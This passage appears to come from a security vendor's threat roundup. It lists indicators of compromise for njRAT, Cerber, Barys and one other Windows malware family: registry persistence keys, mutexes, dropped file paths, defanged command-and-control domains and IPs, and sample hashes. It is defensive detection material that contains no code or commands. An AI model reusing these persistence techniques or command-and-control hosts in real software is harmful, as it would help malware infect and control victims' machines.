Compromise\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`100[.]96[.]181[.]72` | 18 \n`100[.]94[.]213[.]157` | 18 \n`100[.]74[.]125[.]242` | 18 \n`100[.]74[.]241[.]31` | 18 \n`100[.]117[.]63[.]68` | 18 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`www[.]dailygks[.]com` | 18 \n`idnpoker[.]agenbolaterbaik[.]city` | 18 \n`dobrovorot[.]su` | 18 \n`casiroresources[.]com` | 18 \n`isague[.]com` | 18 \nFiles and or directories created | Occurrences \n---|--- \n`%HOMEPATH%\\126.exe` | 18 \n`%TEMP%\\CVRE39.tmp` | 1 \n \n#### File Hashes\n\n` 0e42ea2ebecf3779a9341c0375c8b71f60a88801b3a717d8fe5dec4a2bbee37c 2853b45864dd97b3be97f9acfcc6be83c6024d9b4e5b48d6b56a8c622e106b5e 2c2254c79ef6d0fc9a3c4bb9b865a2694ba00b791042f6f806dc8ae48ff07fa3 35a6c928ace899581d72bbb94aecb90fc54a9ef85b852a12cc77ec1a7fd4a239 3cec47fd33c8debe5e4cee8126ce9d3c977ae39d9baf454f86dd73ba82a87076 3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38 5a0ddb6c22ebb84af02651396e07204801bee4889965dc943cf6e16035771b87 617c999b2244b6e1a787a80a64f8818ae99a0bbd3c5603f95bdc6682c399a1c1 66974cd3270a8bf0aa4af9105ce84960ae7c7425b120b0045624f2615dbcf842 67812a5d87377778d7c2586585d30d7ab4ab6c2c9334844004c12badd5b72eba 71c8341327d3285f1f3c7ad62fdc102fd6a662c68a2f3a98eac7d0d9f5d6ea7b 92ad35b60997f88c37b57dc1fbb525217375289fab05ea7ba5d6c67ed1d00edf 947dd402232ac165d5c9286e67996e725bfe0c530f969aacea44e7979676fb45 aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048 b29038b3debfd28466ba4ea6e626143187bcd998bf442048a56f4737eb0d85fd d1a0bf24f3c653cd6c7f75b8c51c92cec21fc74d04ce8749bf68a5ad7e40b151 d2be052e9a55cc6eada8d74f6b5c614584588797ee7107e17b2811fb47e3d724 eff598d5a0c0ecaa0d8243173520ef331e71fb60c33b94d24932219c9e27abb9 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-04TG3bF-RfI/XiIwmtBmWTI/AAAAAAAADIc/2UsbzDv2yl8QP2mHRBol8-zFlE-ThTLuQCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-m30S64kTdas/XiIwpCvCPFI/AAAAAAAADIg/wQGmRCS1Pf8IRzRt-5Lbcc-WDjUvYILQwCLcBGAsYHQ/s1600/3e73a141bcf5c7a18d8fdc94f34102c1e765c5b0f37ff11c1d122463c4629d38_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-5rUB6N5REL8/XiIwthO7gSI/AAAAAAAADIo/tOVHV4ZSTu0vB8fw5jNYg_pEi6kDvepiACLcBGAsYHQ/s1600/aeed3ac02a448f72ef07047693ee9292d68a54049923a1ec4a53694d517cf048_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.njRAT-7532636-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKU>\\S-1-5-21-2580483871-590521980-3826313501-500 \nValue Name: di ` | 22 \n`<HKCU>\\ENVIRONMENT \nValue Name: SEE_MASK_NOZONECHECKS ` | 22 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: ParseAutoexec ` | 22 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 9b900e9e6a204ac0d795c328b297a541 ` | 1 \n`<HKCU>\\SOFTWARE\\9B900E9E6A204AC0D795C328B297A541 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 3e80006ed1a558f4a4e8c67b4482a653 ` | 1 \n`<HKCU>\\SOFTWARE\\3E80006ED1A558F4A4E8C67B4482A653 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA ` | 1 \n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bac5bd34b5ec131b955ed0d6686691c0 ` | 1 \n`<HKCU>\\SOFTWARE\\BAC5BD34B5EC131B955ED0D6686691C0 \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 
\n`<HKCU>\\SOFTWARE\\EE265A490F50F82D7DA78B5AFC5D4BF1 \nValue Name: [kl] ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 8b9c85cea1b5bc95470d5b663265abba ` | 1 \n`<HKCU>\\SOFTWARE\\8B9C85CEA1B5BC95470D5B663265ABBA \nValue Name: [kl] ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: driver ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\E44B3D2D77E82BFAA8FBE232C3FAC08B ` | 1 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: 1bb40c47beae292b8957771d185e2963 ` | 1 \n`<HKCU>\\SOFTWARE\\1BB40C47BEAE292B8957771D185E2963 \nValue Name: [kl] ` | 1 \nMutexes | Occurrences \n---|--- \n`<32 random hex characters>` | 22 \n`Random` | 3 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`46[.]246[.]13[.]73` | 1 \n`41[.]97[.]3[.]243` | 1 \n`41[.]102[.]190[.]225` | 1 \n`91[.]109[.]176[.]6` | 1 \n`84[.]236[.]13[.]94` | 1 \n`41[.]226[.]95[.]248` | 1 \n`197[.]167[.]16[.]253` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`cadastroseguro2016[.]ddns[.]net` | 3 \n`kounan-19[.]no-ip[.]org` | 1 \n`sasbab[.]ddns[.]net` | 1 \n`pubguk[.]linkpc[.]net` | 1 \n`najor123[.]ddns[.]net` | 1 \n`neonka99[.]ddns[.]net` | 1 \n`no` | 1 \n`skyfall2017[.]ddns[.]net` | 1 \n`service-updater[.]hopto[.]org` | 1 \n`eslam[.]no-ip[.]org` | 1 \n`tigano0724[.]myq-see[.]com` | 1 \n`ghostprocess[.]no-ip[.]info` | 1 \n`taki[.]ddns[.]net` | 1 \n`crazyevil3[.]ddns[.]net` | 1 \n`systemo32[.]publicvm[.]com` | 1 \n`rooowl1999[.]no-ip[.]biz` | 1 \n`kamel23[.]noip[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\svchost.exe` | 4 \n`%TEMP%\\server.exe` | 4 \n`%TEMP%\\<random, matching '[a-z]{4,9}'>.exe` | 4 \n`%APPDATA%\\server.exe` | 2 \n`%APPDATA%\\svhost.exe` | 1 \n`%HOMEPATH%\\server.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\16d577f1045ea00e0472332fe1885e1f.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\2eed382eb0cd52422d5fda835a5d88b5.exe` | 1 \n`%TEMP%\\pc.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\df76fe148f41309232d46b5526143610.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8d580f86972cdfde2bbd41845bc851f9.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\32814b0ea96b317a805dd9174ee7c5c4.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\ee28203cdc477e7ad13344342ffe1e0b.exe` | 1 \n`%TEMP%\\Internet Explorer.exe` | 1 \n`%APPDATA%\\winziy.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\9b900e9e6a204ac0d795c328b297a541.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\3e80006ed1a558f4a4e8c67b4482a653.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\8b9c85cea1b5bc95470d5b663265abba.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.url` | 1 
\n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\driver.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1bb40c47beae292b8957771d185e2963.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\e44b3d2d77e82bfaa8fbe232c3fac08b.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\c4d9b868e64e2ec7e7f1e04c6e64ac91.exe` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\213668f5f21ad17f1b3d939134e17f24.exe` | 1 \n`%APPDATA%\\winx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0462bc4b60370728471971b9326c2e1540370809292ffd6cb5791a61df705bf9 0b331c29e38da9fe5fe00f40e2af43a4ac960ce48539b34e6d506c3b54a49920 162616259b6591503807bda2b9228c88409f4a71c085bc4b39d5eef2b64213c9 1846cfe96f4733d9cc7620cff603abdf1c44fe2f84d34daa79c14b04a726357d 21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d 275e4d554f63db96a64bbca5f0b30ab96199c8595ea0c3c2d46a413f30387a2f 2b140d53ec1d99cc07662d85f14bae2a4e6cfea3b7d66da0b31be4ecd641bae1 2c55658cf368c0f4f16b9f142e6ee6adb91362c79eb5ecab77d93852b35b7599 3022c3729827f0f7ea739b18b073e6c488ce6481eedaae147cc33738401d131e 339e7b601f00ee4b80af2645e1e39a8b71901d328d1c56e4f42e7ba74f16b618 3d8b6537791fe4f05043a40cc0cff83fb5ae54396c40fded6daae018a7a03c0e 437d2adb9946aeb1e630619e4aa571149d2adedeea8f6d0c39c1bed21c4063cb 459304f70aa2e992bdaed0915ec96cda9c99c6edde30698197319f8fa40a4024 461ec9be4e72154e7faebde91b452dbf0c22281405f0966eeddf69330f91ad2d 51e865bd11fd5daff52c74c0072c6e713535d4a90d5b1398b78c806be1a59dc9 53b7c2eadbb2686d6bcfed439d656df597b396f0004b086a9aad6806e7810256 63779c53cc4ab5d02daadffdd2f7b93b3bfc1a137eb1e5a895d7e2b8393f42a5 6b1bbec6381d6c95ef40d1ddb1ffbc015777d30686d9ba4353857f35b5947e15 6e178460a0f54a86e71df31ac2e90ffbaaf00a41ce9722257613f33ed9acc892 79d129fd698fbf62084545a105e6bd3cc027435a42ae3eb48c3e62c6e2ec461e 80aab48e04978ab54b4a50bba68286d1f03af19b27e78e8263b360d10c7f5904 
84bddfdc96745d0be34f31be3b7e4160db6e04fa7d7648ebf03b81807841bffb 86da48f0943d29d940c8ea86a26695026e0a3b5ff74c08cd1189d84e05a57d97 8789bba00344fcb155e891679121b770a4daabe0171a78fccbef5b92322f4105 8ac101bcbb0a30f23ff1f7fb341a3daaa7ff13f045c0e812ac9f6c5079ef82af `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-vCCx56X9Gbs/XiIw8gJ-GAI/AAAAAAAADI0/1ag2zEuHoNE5YN4coSXJqOtdlzRuakStQCLcBGAsYHQ/s1600/21f09de33d10673fb5f8c2f1cf5924f5b81019e037a44b7f151da61b84c85b0d_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-dtUO5Nu3rpI/XiIxA8SG6PI/AAAAAAAADI8/YH-lnvycAV8Ej-OI9sBxmRoQukAxCYdBQCLcBGAsYHQ/s1600/ec56a0a4ba7d45994dd8a6757dc1eb730228ca5ce23380085f501a50ba8ae7b3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Cerber-7533438-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: SuperHidden ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER \nValue Name: Run ` | 25 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\COMMAND PROCESSOR \nValue Name: AutoRun ` | 25 \n`<HKCU>\\CONTROL PANEL\\DESKTOP \nValue Name: SCRNSAVE.EXE ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS\\{21A3D5EE-E123-244A-98A1-8E36C26EFF6D} ` | 25 \n`<HKCU>\\PRINTERS\\DEFAULTS ` | 25 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\16000009 \nValue Name: Element ` | 24 
\n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 \nValue Name: Element ` | 23 \n`<HKLM>\\BCD00000000\\OBJECTS\\{926583E4-EF64-11E4-BEED-D6738078AD98}\\ELEMENTS\\250000E0 ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: fsutil ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: logman ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: rasautou ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: EhStorAuthn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: ntoskrnl ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: eventcreate ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUNONCE \nValue Name: isoburn ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: hh ` | 1 \nMutexes | Occurrences \n---|--- \n`shell.{381828AA-8B28-3374-1B67-35680555C5EF}` | 24 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`31[.]184[.]234[.]0/25` | 25 \n`208[.]95[.]112[.]1` | 25 \n`69[.]195[.]146[.]130` | 1 \nDomain Names contacted by malware. 
Does not indicate maliciousness | Occurrences \n---|--- \n`ip-api[.]com` | 25 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_00` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_01` | 25 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\Component_03` | 25 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\fsutil.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\fsutil.exe` | 2 \n`%System32%\\Tasks\\fsutil` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\logman.lnk` | 2 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\logman.exe` | 2 \n`%System32%\\Tasks\\logman` | 2 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\odbcconf.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\odbcconf.exe` | 1 \n`%System32%\\Tasks\\javaws` | 1 \n`%System32%\\Tasks\\logagent` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\ARP.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\ARP.EXE` | 1 \n`%System32%\\Tasks\\perfhost` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\perfhost.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\perfhost.exe` | 1 \n`%System32%\\Tasks\\EhStorAuthn` | 1 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\verclsid.lnk` | 1 \n`%APPDATA%\\{6F885251-E36F-0FE6-9629-63208157D7A2}\\verclsid.exe` | 1 \n`%System32%\\Tasks\\verclsid` | 1 \n`%System32%\\Tasks\\rasautou` | 1 \n`%System32%\\Tasks\\mfpmp` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0c7e5bb1cee76e9863ce3b44c24eec38b1eb92892c5b60a833982516a54e9b76 28374ce7589aacac9039559d75f55b2fc82976fbb26e9fcbd4932ae9fba0ff59 358ef9b233660e1630b16cb46e59ca4e8e568aba5d18d2011d01531831656a4f 49b45cd004664bfa865adf65e6f0721c32e26855854ae36e1edbf807c70f6bda 
52b992d21becd7be682c2922364a752c8175ef0061a7acd6f4edc077f80e82b1 5602333889bbd3667cb416a50968d930d482b2c85ceb1bea928378118f582d8a 622889cf94266b040d5fc4b648c5010da452d773d6af23eb6d92ef087e885de0 63920b6de768c6e2b2168c51b1e37ade32c2963c9ab270298a6a2c41d413b81f 674fabcda596680972f25c7a01401805f612211a6949231b6b0b51a7b4dc4bb6 75b7b2dbc574900f135e4b0e640ab9ba649309a8d6ad8dee502f24a777873bcf 79ad8ad6a72e5014dee5f21dc71d8dbb580aa2214f39680d990e5f9fae2c033a 80376654651c543804118148246ba881732d1c03312f3a5966bc750a5b9323d0 807a64e31851a9e6b31b848e8cf3f98aee708c3f9fb202083380dbb6c01e1ab6 90a475321d0b15ea933d816290542ba4eaf96b24275d5ad89f54f2e2986a1c6e 91c10c1d3338faa90223e12db01178109fee544d1cdd598c9e6eb2441df372df a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3 b54d186c102b61025a31209381847c9a92cbcc3de0180b85c1acd14eaf4543ac c4a92d2271b389d943298c11e93283ea32565956a7d36497de0efdbc41c050c5 c51909551fe0e12ac55b976834ec5e529819b9865afa470bc39ca19ebc50855f d85fd7e3a234d353f00bb58d8630e67de2e654ce33fbe13e1a11c74f3840ebdd db39d08dd5b947bff9410e63a7a120aea4ea8c466af50ffc14c42e8d19df14c8 de64250a40802d3495fa2b0d6deac9ea159652e4e7b3c52d54abe55d986f0973 e6e307c6d4abeb1aa62f20c16cd0bf9cfc667ee945d4e6e7332e475d922c70af e6fa6eca90b0231944129a2b9573ac03c019a788f91044cc50e743b0dd0fd9fa f75b4f1eb4715ad1f6289df06ae3f1ef5e992fa36e4cdebd27ccdb6106945076 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-KH8Ebadzxj8/XiIxOnUtkrI/AAAAAAAADJE/hh-8IwESxrEQiePz6oEZZyOpmTyRlXPwwCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_amp.png>)\n\n \n\n\n#### 
ThreatGrid\n\n[](<https://1.bp.blogspot.com/-2hgJ5eNsa_k/XiIxSHr2ZeI/AAAAAAAADJM/OW8A9qAZTB8c2xe9T0XX-T7kxg1NxvWTQCLcBGAsYHQ/s1600/a36b78449ee435b25af5f6af94ef15831ad257e5d311ebb21d5ed65fb13ac9d3_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Packed.Barys-7532466-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: Hidden ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: dbe70bc52631c4df155a4a1a865cf25d ` | 26 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION \nValue Name: NOiR ` | 14 \n`<HKCU>\\SOFTWARE\\SHORTCUTINFECTION ` | 14 \nMutexes | Occurrences \n---|--- \n`~[P6Er7#4$&WJr83!]~` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`41[.]38[.]1[.]86` | 1 \n`141[.]255[.]155[.]177` | 1 \n`41[.]239[.]65[.]189` | 1 \n`206[.]189[.]182[.]212` | 1 \n`178[.]80[.]27[.]0` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`b10j[.]ddns[.]net` | 1 \n`uploadapk[.]ddns[.]net` | 1 \n`anadnjwan[.]zapto[.]org` | 1 \n`xmu51k[.]ddns[.]net` | 1 \n`youssefassd1[.]hopto[.]org` | 1 \n`clivou[.]ddns[.]net` | 1 \n`hack-qi[.]no-ip[.]info` | 1 \n`camifer93[.]ddns[.]net` | 1 \n`ronaldo20[.]no-ip[.]org` | 1 \n`zabanahacker[.]no-ip[.]org` | 1 \n`magicfuny12[.]publicvm[.]com` | 1 \n`badr123[.]ddns[.]net` | 1 \n`level[.]publicvm[.]com` | 1 \n`rostom071995[.]ddns[.]net` | 1 \n`microsoftstores[.]sytes[.]net` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\svchost.exe` | 26 \n`%TEMP%\\DarkData.dat` | 26 \n`%HOMEPATH%\\Start Menu\\Programs\\Startup\\svchost.exe` | 21 \n`%TEMP%\\Microsoft` | 18 \n`%TEMP%\\Microsoft\\svchost.exe` | 18 \n`\\autorun.inf` | 13 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 12 \n`%TEMP%\\dw.log` | 9 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 9 
\n`%LOCALAPPDATA%\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Cookies\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Network Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Printer Shortcuts\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Recent\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\SendTo\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Start Menu\\WOrm.exe` | 6 \n`%APPDATA%\\Microsoft\\Windows\\Templates\\WOrm.exe` | 6 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 6 \n`%HOMEPATH%\\AppData\\WOrm.exe` | 6 \n`%APPDATA%\\WOrm.exe` | 6 \n`%HOMEPATH%\\Contacts\\WOrm.exe` | 6 \n`%HOMEPATH%\\Cookies\\WOrm.exe` | 6 \n`%HOMEPATH%\\Desktop\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Music\\WOrm.exe` | 6 \n`%HOMEPATH%\\Documents\\My Pictures\\WOrm.exe` | 6 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 004e01f888cb6241fc7da95d1798830ed0c52ea179b1ed0b2f71598e7d83fdc4 006261e3d8b0d00ae9f6596dd914440a19b1b0ab333533c03fd75c3e63f07f0d 022d2461933a4aafe67d8ddb3c5fd7f14eea9035dec79bea200ff1d57776762d 02de146284642091fd6104b2a09a0a5ffc92d51c28e8c492acecbd39fb0c30e0 033645d3516e2f25ddb3566c1eed8a6be6d3c023f7f0e98c868efa12483dfac3 04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d 0780a44389bf1a4cde74cc26d87cf3ee10ab0f19ba75dc941abacb0939f6c0fd 085a78af5d0146251a13bc743866fe4292d84a6c0753c6e6fcbb91d2c7826dfe 0887bb1422d2b1a80b0912816d2e776afe9db36ae392887c30dffb6950b39190 08d8cf4bd5635a6930758f7736259f230ff559ede4880d044aa4eaed47f37115 0b0c9946d82dba06fceda4ce8a8f2a8ad828adba44e630f4652a5784d4305e5c 0c85f4b989930dd44f791828bad61061e8ff325142e1dd275fa30295a343c051 0d638e32faab7502716a78610e97a4c55974ff1c648784aa66294f1e594cbe1f 0de13ccba02abce52ee48511d094b474fbf8807aa54ea316f86a83befe85a1b6 1081f90d1fa09214611b5e0255d714db254f502e945069e93973eb0f63d00208 12bd605a3b68b17d0279e5fd34cb2c9dee540f4eb1b248447d101c9199ebfaf5 12f1c270b4df8c8baa2eb194f85267da965450cf35696644d71d3835a3905e1b 
13c397c69dd1c2357af059f5760a551567834c836b6d124e4e1ffee085feda80 1493472fd451f1109f5c245245469e6882f92d34610a6c468e3af5dd9acdac89 17b64ea8a52fce27bcd439a2762f6a8dff4235c10ca99a60722e481509e42b0b 1888096d2e773f3e1377ee329bf649d0032e384badd451731cc1f6cf7eb924ce 18a5f4a28bd04a9e6b7283aa80bfe4649e48cac3592f72fed511e10935c80678 18f55fa2f805d9a0aa51b6c6e934b9ea14d4c63fb578811dad1d7816e5758b71 1962b11c5701a4b591c219a30164708e42bad73e72a58b5896cfa48c0ad20ed5 1a91bfeb723c4ad729eea5e22da6f8afeecbdb990a18c3272e1fc92d7c94bdae `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP |  \nCloudlock | N/A \nCWS |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWSA |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-fgb3pvwEXlE/XiIxgdtAs2I/AAAAAAAADJQ/RjZ8gdZK6nYyTdIFPzGYXSl84K5tOndqQCLcBGAsYHQ/s1600/04ce16123c1db27009dfd8a2546810c881a22b6eeed4697d64cb44af2e69e75d_amp.png>)\n\n \n\n\n#### 